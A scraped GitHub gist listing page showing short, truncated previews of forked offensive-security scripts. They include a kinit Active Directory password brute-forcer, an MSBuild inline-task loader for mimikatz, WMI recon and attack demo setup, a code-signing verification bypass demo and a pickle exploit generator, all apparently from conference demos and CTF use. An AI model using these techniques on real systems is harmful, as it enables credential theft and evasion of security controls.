jbarcia
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @ | |
| * | |
| 0 | |
| 00 | |
| 0-0 | |
| 000 | |
| 0000 | |
| 00000 |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @ | |
| * | |
| 0 | |
| 00 | |
| 0-0 | |
| 000 | |
| 0000 | |
| 00000 |
jbarcia
/ Azure
Last active
July 25, 2017 22:42
— forked from vysecurity/Azure
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| admin.iris.net | |
| admin.mywebvalet.net | |
| admin.seo.com.cn | |
| api.mywebvalet.net | |
| api.nuget.org | |
| api.squaremeal.co.uk | |
| app.iris.net | |
| app.mywebvalet.net | |
| app.swyftmedia.com | |
| cdn.24sevenoffice.com |
jbarcia
/ kinit_brute.sh
Created
July 30, 2017 23:11
— forked from ropnop/kinit_brute.sh
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Title: kinit_brute.sh | |
| # Author: @ropnop | |
| # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
| # The script configures the realm and KDC for you based on the domain provided and the domain controller | |
| # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
| # Only tested with Heimdal kerberos (error messages might be different for MIT clients) | |
| # Note: this *will* lock out accounts if a domain lockout policy is set. Be careful |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
jbarcia
/ WMI_recon_and_attacks.ps1
Created
August 22, 2017 12:44
— forked from mattifestation/WMI_recon_and_attacks.ps1
BlueHat 2016 - WMI recon and attack demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############# | |
| ### SETUP ### | |
| ############# | |
| # Set up remote session | |
| $Credential = Get-Credential TestUser | |
| $AdminCred = Get-Credential Administrator | |
| $SessionOption = New-CimSessionOption -Protocol Dcom | |
| $CimSession = New-CimSession -Credential $Credential -ComputerName TestPC -SessionOption $SessionOption | |
| $AdminCimSession = New-CimSession -Credential $AdminCred -ComputerName TestPC -SessionOption $SessionOption |
jbarcia
/ SignatureVerificationAttack.ps1
Created
September 28, 2017 11:29
— forked from mattifestation/SignatureVerificationAttack.ps1
Demos from my DerbyCon keynote
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Host.Runspace.LanguageMode | |
| Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1 | |
| Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe | |
| # Try to execute the script. Add-Type will fail. | |
| Import-Module C:\Demo\bypass_test.psm1 | |
| $VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + | |
| '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes mimikatz. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <!-- Save This File And Execute The Above Command --> | |
| <!-- Author: Casey Smith, Twitter: @subTee --> | |
| <!-- License: BSD 3-Clause --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
jbarcia
/ slackmap.sh
Created
June 6, 2018 23:51
— forked from jgamblin/slackmap.sh
Script to NMAP a network and Post Differences to Slack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| TARGETS="192.168.1.0/24" | |
| OPTIONS="-v -T4 -F -sV" | |
| date=$(date +%Y-%m-%d-%H-%M-%S) | |
| cd /nmap/diffs | |
| nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null | |
| slack(){ | |
| curl -F file=@diff-$date -F initial_comment="Internal Port Change Detected" -F channels=#alerts -F token=xxxx-xxxx-xxxx https://slack.com/api/files.upload | |
| } |
jbarcia
/ pickle_exploit_generator.py
Created
August 8, 2018 03:47
— forked from 0xBADCA7/pickle_exploit_generator.py
Python cPickle/pickle exploit generator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ''' | |
| 0xBADCA7 | |
| Vodka goes down the throat better with pickle. | |
| This script generates pickled object representation. Good for CTFs. | |
| Params: [1] function, [2] parameter, [3] pickle type | |
| Sample run: |